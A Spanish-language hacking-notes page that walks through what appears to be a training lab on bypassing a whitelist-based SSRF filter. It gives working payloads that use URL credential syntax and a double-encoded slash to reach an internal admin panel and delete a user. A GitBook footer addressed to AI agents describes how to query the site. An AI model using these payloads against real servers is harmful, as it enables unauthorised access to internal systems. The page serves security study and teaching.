> For the complete documentation index, see [llms.txt](https://hacking-notes.jord4n.pro/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://hacking-notes.jord4n.pro/es/web/ssrf/ssrf-with-whitelist-based-filter.md).

# SSRF con filtrado basado en lista blanca

### SSRF con filtro de entrada basado en lista blanca

La función de comprobación de stock envía solicitudes a un sistema interno. / El objetivo es modificar la URL utilizada en la `stockApi` parámetro para acceder a la interfaz de administración ubicada en `HTTP://localhost/admin`, y luego eliminar al usuario **carlos**. / El desarrollador ha implementado una defensa anti-SSRF basada en una **lista blanca de hosts autorizados**, que debe ser eludida.

```javascript
stockApi=http://stock.weliketoshop.net:8080/product/stock/check?productId=1%26storeId=1
```

#### **Análisis del filtro**

La aplicación solo permite solicitudes al siguiente host:

```bash
stockApi=http://127.0.0.1/admin
```

<figure><img src="/files/a4b65574fe44db051efea453e4de5e6939da63c2" alt=""><figcaption></figcaption></figure>

Si cambiamos la URL a `localhost` o a una dirección interna, obtenemos el error:

El host externo de comprobación de stock debe ser stock.weliketoshop.net

#### **Eludir la lista blanca**

La idea es usar la `username:password@host` sintaxis en las URL. / Este método nos permite **hacer que el host validado por la lista blanca aparezca en la parte de "authority"** de la URL, mientras en realidad dirige la solicitud a `localhost`.

```bash
http://username:password@website.com
```

Carga útil utilizada:

```bash
stockApi=http://localhost:80%252f@stock.weliketoshop.net:8080
```

Con `/` (`%252f`) doble codificación, el servidor interpreta correctamente la parte redirigida a `localhost`.

Esto permite acceder al panel de administración interno.

<figure><img src="/files/d0bafb42eb59224aa614df9e201f81eded46c9f1" alt=""><figcaption></figcaption></figure>

#### **Eliminación del usuario Carlos**

Una vez que el bypass funciona, la URL de eliminación se llama directamente:

{% code overflow="wrap" %}

```bash
stockApi=http://localhost:80%252f@stock.weliketoshop.net:8080/admin?delete=username=carlos
```

{% endcode %}


---

# Agent Instructions
This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com.

## Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter, and the optional `goal` query parameter:

```
GET https://hacking-notes.jord4n.pro/es/web/ssrf/ssrf-with-whitelist-based-filter.md?ask=<question>&goal=<endgoal>
```

`ask` is the immediate question: it should be specific, self-contained, and written in natural language.
`goal` is optional and describes the broader end goal you are ultimately trying to accomplish on behalf of the user. GitBook uses it to tailor the answer towards what is most useful for that goal.

The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.
